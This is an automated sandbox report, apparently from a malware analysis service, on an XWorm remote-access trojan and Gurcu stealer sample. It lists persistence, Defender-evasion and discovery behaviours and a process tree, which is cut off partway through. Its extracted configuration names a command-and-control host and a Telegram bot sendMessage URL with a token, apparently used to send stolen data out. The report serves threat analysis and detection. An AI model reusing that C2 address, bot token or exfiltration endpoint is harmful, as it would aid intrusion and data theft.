gurcu | hxxps://gofile[.]io/d/jLte1d

Analysis

max time kernel
218s
max time network
230s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
25-01-2025 14:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://gofile.io/d/jLte1d

Score

10^/10

gurcu xworm defense_evasion discovery execution persistence rat stealer trojan

Malware Config

Extracted

Family

xworm

sponef159-35748.portmap.host:35748

Attributes

Install_directory
%AppData%
install_file
svchost.exe
telegram
https://api.telegram.org/bot7508868671:AAHiIQ1dn0xnl7CLa-i1NSSTJmrxEo0H9GI/sendMessage?chat_id=6094400048

Extracted

Family

gurcu

https://api.telegram.org/bot7508868671:AAHiIQ1dn0xnl7CLa-i1NSSTJmrxEo0H9GI/sendMessage?chat_id=6094400048

Signatures

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral1/memory/3740-1905-0x0000000001000000-0x000000000100E000-memory.dmp	disable_win_def

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x001a00000002ab02-68.dat	family_xworm
behavioral1/memory/3740-109-0x0000000000920000-0x0000000000936000-memory.dmp	family_xworm

Gurcu family
gurcu
Gurcu, WhiteSnake
Gurcu aka WhiteSnake is a malware stealer written in C#.
stealer gurcu
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2812	powershell.exe
1488	powershell.exe
1648	powershell.exe
1836	powershell.exe

Downloads MZ/PE file 1 IoCs

flow	pid	Process
18	5728	msedge.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	XClient.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk	XClient.exe

Executes dropped EXE 5 IoCs

pid	Process
3740	XClient.exe
2020	svchost.exe
5816	svchost.exe
3516	svchost.exe
3516	svchost.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe"	XClient.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\Recovery	ReAgentc.exe
File opened for modification	C:\Windows\system32\Recovery\ReAgent.xml	ReAgentc.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3740 set thread context of 1468	3740	XClient.exe	110

Drops file in Windows directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	ReAgentc.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	ReAgentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	ReAgentc.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\XClient.exe:Zone.Identifier	msedge.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	Taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	Taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	Taskmgr.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Software\Microsoft\Internet Explorer\Toolbar	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	explorer.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133822899051479070"	chrome.exe

Modifies registry class 22 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents"	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings\MuiCache	MiniSearchHost.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	explorer.exe
Key created	\Registry\User\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\NotificationData	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-4018527317-446799424-2810249686-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	explorer.exe

NTFS ADS 3 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 554894.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 350844.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\XClient.exe:Zone.Identifier	msedge.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
6036	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
5192	explorer.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5728	msedge.exe
5728	msedge.exe
4392	msedge.exe
4392	msedge.exe
4776	identity_helper.exe
4776	identity_helper.exe
4196	msedge.exe
4196	msedge.exe
1968	msedge.exe
1968	msedge.exe
2812	powershell.exe
2812	powershell.exe
1488	powershell.exe
1488	powershell.exe
1648	powershell.exe
1648	powershell.exe
1836	powershell.exe
1836	powershell.exe
1220	powershell.exe
1220	powershell.exe
5544	msedge.exe
5544	msedge.exe
5136	msedge.exe
5136	msedge.exe
5324	chrome.exe
5324	chrome.exe
1692	identity_helper.exe
1692	identity_helper.exe
1008	msedge.exe
1008	msedge.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
5192	explorer.exe
6008	Taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 26 IoCs

pid	Process
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
5136	msedge.exe
5136	msedge.exe
5136	msedge.exe
5136	msedge.exe
5324	chrome.exe
5324	chrome.exe
5324	chrome.exe
5324	chrome.exe
5136	msedge.exe
5136	msedge.exe
5136	msedge.exe
5136	msedge.exe
5136	msedge.exe
5136	msedge.exe
5136	msedge.exe
5136	msedge.exe
5136	msedge.exe
5136	msedge.exe
5136	msedge.exe
5136	msedge.exe

Suspicious use of AdjustPrivilegeToken 45 IoCs

description	pid	Process
Token: SeDebugPrivilege	3740	XClient.exe
Token: SeDebugPrivilege	2812	powershell.exe
Token: SeDebugPrivilege	1488	powershell.exe
Token: SeDebugPrivilege	1648	powershell.exe
Token: SeDebugPrivilege	1836	powershell.exe
Token: SeDebugPrivilege	3740	XClient.exe
Token: SeDebugPrivilege	2020	svchost.exe
Token: SeDebugPrivilege	1220	powershell.exe
Token: SeShutdownPrivilege	5324	chrome.exe
Token: SeCreatePagefilePrivilege	5324	chrome.exe
Token: SeDebugPrivilege	5816	svchost.exe
Token: SeShutdownPrivilege	5324	chrome.exe
Token: SeCreatePagefilePrivilege	5324	chrome.exe
Token: SeShutdownPrivilege	5324	chrome.exe
Token: SeCreatePagefilePrivilege	5324	chrome.exe
Token: SeShutdownPrivilege	5324	chrome.exe
Token: SeCreatePagefilePrivilege	5324	chrome.exe
Token: SeShutdownPrivilege	5324	chrome.exe
Token: SeCreatePagefilePrivilege	5324	chrome.exe
Token: SeShutdownPrivilege	5324	chrome.exe
Token: SeCreatePagefilePrivilege	5324	chrome.exe
Token: SeShutdownPrivilege	5324	chrome.exe
Token: SeCreatePagefilePrivilege	5324	chrome.exe
Token: SeShutdownPrivilege	5324	chrome.exe
Token: SeCreatePagefilePrivilege	5324	chrome.exe
Token: SeShutdownPrivilege	5324	chrome.exe
Token: SeCreatePagefilePrivilege	5324	chrome.exe
Token: SeShutdownPrivilege	5324	chrome.exe
Token: SeCreatePagefilePrivilege	5324	chrome.exe
Token: SeShutdownPrivilege	5324	chrome.exe
Token: SeCreatePagefilePrivilege	5324	chrome.exe
Token: 33	3304	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	3304	AUDIODG.EXE
Token: SeShutdownPrivilege	5324	chrome.exe
Token: SeCreatePagefilePrivilege	5324	chrome.exe
Token: SeShutdownPrivilege	5324	chrome.exe
Token: SeCreatePagefilePrivilege	5324	chrome.exe
Token: SeShutdownPrivilege	5324	chrome.exe
Token: SeCreatePagefilePrivilege	5324	chrome.exe
Token: SeDebugPrivilege	6008	Taskmgr.exe
Token: SeSystemProfilePrivilege	6008	Taskmgr.exe
Token: SeCreateGlobalPrivilege	6008	Taskmgr.exe
Token: SeDebugPrivilege	3516	svchost.exe
Token: SeDebugPrivilege	3516	svchost.exe
Token: SeShutdownPrivilege	3740	XClient.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
5136	msedge.exe
5136	msedge.exe
5136	msedge.exe
5136	msedge.exe
5136	msedge.exe
5136	msedge.exe
5136	msedge.exe
5136	msedge.exe
5136	msedge.exe
5136	msedge.exe
5136	msedge.exe
5136	msedge.exe
5136	msedge.exe
5136	msedge.exe
5136	msedge.exe
5136	msedge.exe
5136	msedge.exe
5136	msedge.exe
5136	msedge.exe
5136	msedge.exe
5136	msedge.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
4392	msedge.exe
5324	chrome.exe
5324	chrome.exe
5324	chrome.exe
5324	chrome.exe
5324	chrome.exe
5324	chrome.exe
5324	chrome.exe
5324	chrome.exe
5324	chrome.exe
5324	chrome.exe
5324	chrome.exe
5324	chrome.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe
6008	Taskmgr.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
5192	explorer.exe
5192	explorer.exe
5460	MiniSearchHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4392 wrote to memory of 5028	4392	msedge.exe	77
PID 4392 wrote to memory of 5028	4392	msedge.exe	77
PID 4392 wrote to memory of 3940	4392	msedge.exe	78
PID 4392 wrote to memory of 3940	4392	msedge.exe	78
PID 4392 wrote to memory of 3940	4392	msedge.exe	78
PID 4392 wrote to memory of 3940	4392	msedge.exe	78
PID 4392 wrote to memory of 3940	4392	msedge.exe	78
PID 4392 wrote to memory of 3940	4392	msedge.exe	78
PID 4392 wrote to memory of 3940	4392	msedge.exe	78
PID 4392 wrote to memory of 3940	4392	msedge.exe	78
PID 4392 wrote to memory of 3940	4392	msedge.exe	78
PID 4392 wrote to memory of 3940	4392	msedge.exe	78
PID 4392 wrote to memory of 3940	4392	msedge.exe	78
PID 4392 wrote to memory of 3940	4392	msedge.exe	78
PID 4392 wrote to memory of 3940	4392	msedge.exe	78
PID 4392 wrote to memory of 3940	4392	msedge.exe	78
PID 4392 wrote to memory of 3940	4392	msedge.exe	78
PID 4392 wrote to memory of 3940	4392	msedge.exe	78
PID 4392 wrote to memory of 3940	4392	msedge.exe	78
PID 4392 wrote to memory of 3940	4392	msedge.exe	78
PID 4392 wrote to memory of 3940	4392	msedge.exe	78
PID 4392 wrote to memory of 3940	4392	msedge.exe	78
PID 4392 wrote to memory of 3940	4392	msedge.exe	78
PID 4392 wrote to memory of 3940	4392	msedge.exe	78
PID 4392 wrote to memory of 3940	4392	msedge.exe	78
PID 4392 wrote to memory of 3940	4392	msedge.exe	78
PID 4392 wrote to memory of 3940	4392	msedge.exe	78
PID 4392 wrote to memory of 3940	4392	msedge.exe	78
PID 4392 wrote to memory of 3940	4392	msedge.exe	78
PID 4392 wrote to memory of 3940	4392	msedge.exe	78
PID 4392 wrote to memory of 3940	4392	msedge.exe	78
PID 4392 wrote to memory of 3940	4392	msedge.exe	78
PID 4392 wrote to memory of 3940	4392	msedge.exe	78
PID 4392 wrote to memory of 3940	4392	msedge.exe	78
PID 4392 wrote to memory of 3940	4392	msedge.exe	78
PID 4392 wrote to memory of 3940	4392	msedge.exe	78
PID 4392 wrote to memory of 3940	4392	msedge.exe	78
PID 4392 wrote to memory of 3940	4392	msedge.exe	78
PID 4392 wrote to memory of 3940	4392	msedge.exe	78
PID 4392 wrote to memory of 3940	4392	msedge.exe	78
PID 4392 wrote to memory of 3940	4392	msedge.exe	78
PID 4392 wrote to memory of 3940	4392	msedge.exe	78
PID 4392 wrote to memory of 5728	4392	msedge.exe	79
PID 4392 wrote to memory of 5728	4392	msedge.exe	79
PID 4392 wrote to memory of 5316	4392	msedge.exe	80
PID 4392 wrote to memory of 5316	4392	msedge.exe	80
PID 4392 wrote to memory of 5316	4392	msedge.exe	80
PID 4392 wrote to memory of 5316	4392	msedge.exe	80
PID 4392 wrote to memory of 5316	4392	msedge.exe	80
PID 4392 wrote to memory of 5316	4392	msedge.exe	80
PID 4392 wrote to memory of 5316	4392	msedge.exe	80
PID 4392 wrote to memory of 5316	4392	msedge.exe	80
PID 4392 wrote to memory of 5316	4392	msedge.exe	80
PID 4392 wrote to memory of 5316	4392	msedge.exe	80
PID 4392 wrote to memory of 5316	4392	msedge.exe	80
PID 4392 wrote to memory of 5316	4392	msedge.exe	80
PID 4392 wrote to memory of 5316	4392	msedge.exe	80
PID 4392 wrote to memory of 5316	4392	msedge.exe	80
PID 4392 wrote to memory of 5316	4392	msedge.exe	80
PID 4392 wrote to memory of 5316	4392	msedge.exe	80
PID 4392 wrote to memory of 5316	4392	msedge.exe	80
PID 4392 wrote to memory of 5316	4392	msedge.exe	80
PID 4392 wrote to memory of 5316	4392	msedge.exe	80
PID 4392 wrote to memory of 5316	4392	msedge.exe	80

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://gofile.io/d/jLte1d
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4392
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff994db3cb8,0x7ff994db3cc8,0x7ff994db3cd8
  2⤵
  PID:5028
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,13038058931919125201,13103682843009383228,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1920 /prefetch:2
  2⤵
  PID:3940
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,13038058931919125201,13103682843009383228,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2380 /prefetch:3
  2⤵
  - Downloads MZ/PE file
  - Suspicious behavior: EnumeratesProcesses
  PID:5728
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1908,13038058931919125201,13103682843009383228,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2780 /prefetch:8
  2⤵
  PID:5316
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13038058931919125201,13103682843009383228,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
  2⤵
  PID:5980
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13038058931919125201,13103682843009383228,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
  2⤵
  PID:3760
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13038058931919125201,13103682843009383228,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4616 /prefetch:1
  2⤵
  PID:3380
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1908,13038058931919125201,13103682843009383228,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5052 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4776
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13038058931919125201,13103682843009383228,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5148 /prefetch:1
  2⤵
  PID:3300
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
